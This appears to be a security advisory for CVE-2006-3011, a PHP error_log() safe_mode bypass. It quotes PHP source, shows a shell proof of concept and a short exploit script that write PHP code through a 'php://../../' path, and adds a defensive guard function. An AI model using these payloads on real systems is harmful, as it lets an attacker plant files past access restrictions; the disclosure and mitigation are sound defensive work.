BUGTRAQ ID: 18645
CVE(CAN) ID: CVE-2006-3011
PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML.
PHP's error_log() function contains a safe_mode restriction bypass vulnerability:
PHP5 (lines 2013-2050):
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {
        case 1: /* send an email */
        {
#if HAVE_SENDMAIL
            if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
                return FAILURE;
            }
#else
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
            return FAILURE;
#endif
        }
        break;

        case 2: /* send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3: /* save to a file */
            /* opt is the caller-supplied destination; IGNORE_URL is combined with ENFORCE_SAFE_MODE here */
            stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
In option 3:
The flaw lies in php_stream_open_wrapper(). If the user supplies a destination of the form "prefix://../../", the IGNORE_URL flag causes the safe_mode check to be skipped.
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'
Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1
Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
A user who can load arbitrary PHP code, or who controls the arguments of an error_log() call, can exploit this vulnerability to read or write restricted files on the target system.
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:
http://www.php.net
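As an interim application-level mitigation while no vendor fix is available, the following added example (not the advisory's PoC and not PHP's own code) refuses error_log() file destinations that carry a scheme prefix or a ".." component and confines them to a hypothetical LOG_DIR:

```php
<?php
// Application-level guard for error_log() destinations (added example, not
// code from the advisory or from PHP). Assumption: the application only ever
// writes its own logs below LOG_DIR, a hypothetical directory.
const LOG_DIR = '/var/log/myapp';

/**
 * Return a canonical file path below LOG_DIR for $dest, or null if $dest
 * must not be passed to error_log() as a message_type 3 destination.
 */
function safe_error_log_target(string $dest): ?string
{
    // A scheme prefix ("php://", "file://", ...) is exactly what the advisory
    // shows slipping past the safe_mode check under IGNORE_URL, so refuse it.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $dest)) {
        return null;
    }
    // Refuse NUL bytes and any ".." path component.
    if (strpos($dest, "\0") !== false || preg_match('#(^|/)\.\.(/|$)#', $dest)) {
        return null;
    }
    // Resolve the directory part (the file itself may not exist yet) and make
    // sure it is LOG_DIR or a directory below it; this also defeats symlinks.
    $base = realpath(LOG_DIR);
    $dir  = realpath(LOG_DIR . '/' . dirname($dest));
    if ($base === false || $dir === false
        || ($dir !== $base && strpos($dir, $base . '/') !== 0)) {
        return null;
    }
    return $dir . '/' . basename($dest);
}

/** Log $message to $dest only if the destination passes the guard above. */
function log_safely(string $message, string $dest): bool
{
    $target = safe_error_log_target($dest);
    if ($target === null) {
        // Fall back to the configured error log (message_type 0) and record
        // the rejected destination so the attempt is visible to operators.
        return error_log('error_log destination rejected: ' . addcslashes($dest, "\0..\37"));
    }
    return error_log($message, 3, $target);
}
```

With this guard in place, the advisory's "php://../../www/temp/sr.php" destination is rejected at the scheme check and never reaches php_stream_open_wrapper().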
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>